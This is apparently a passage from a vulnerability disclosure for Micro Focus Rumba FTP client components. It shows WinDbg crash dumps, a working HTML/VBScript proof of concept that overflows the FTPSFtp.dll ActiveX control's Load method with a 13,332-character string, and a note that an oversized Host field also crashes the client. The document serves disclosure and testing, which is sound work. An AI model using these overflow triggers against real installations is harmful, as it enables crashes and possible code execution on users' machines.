eax=baadf00d ebx=55944ba4 ecx=baadf00d edx=005c32b0 esi=0022e738 edi=0022e5ec
eip=558f3a60 esp=0022e578 ebp=0022e580 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
ProfEdit+0x13a60:
558f3a60 c6808401000000 mov byte ptr [eax+184h],0 ds:002b:baadf191=??
-------------------------
9. newVal (FTPSFtp.dll):
-------------------------
<html>
<object classid='clsid:ACBBEC6D-7FD4-44E3-B1A4-B442D40F5818' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files (x86)\Micro Focus\Micro Focus Utilities\FTP Client\FTPSFtp.dll"
prototype = "Sub Load ( ByVal newVal As String )"
memberName = "Load"
progid = "FTPSFTPLib.SFtpSession"
argCount = 1
arg1=String(13332, "A")
target.Load arg1
</script>
</html>
===
STATUS_STACK_BUFFER_OVERRUN encountered
(608.f74): Break instruction exception - code 80000003 (first chance)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\syswow64\kernel32.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SysWOW64\MSVCR120.dll -
eax=00000000 ebx=10027e44 ecx=757d047c edx=0039dc45 esi=00000000 edi=0039e594
eip=757d025d esp=0039de8c ebp=0039df08 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
kernel32!GetProfileStringW+0x12cc1:
757d025d cc int 3
----------------------
10. Host (FTP Client):
----------------------
For the RUMBA FTP Client PoC, copy ~300 bytes array and paste it in the Host field when creating a new session.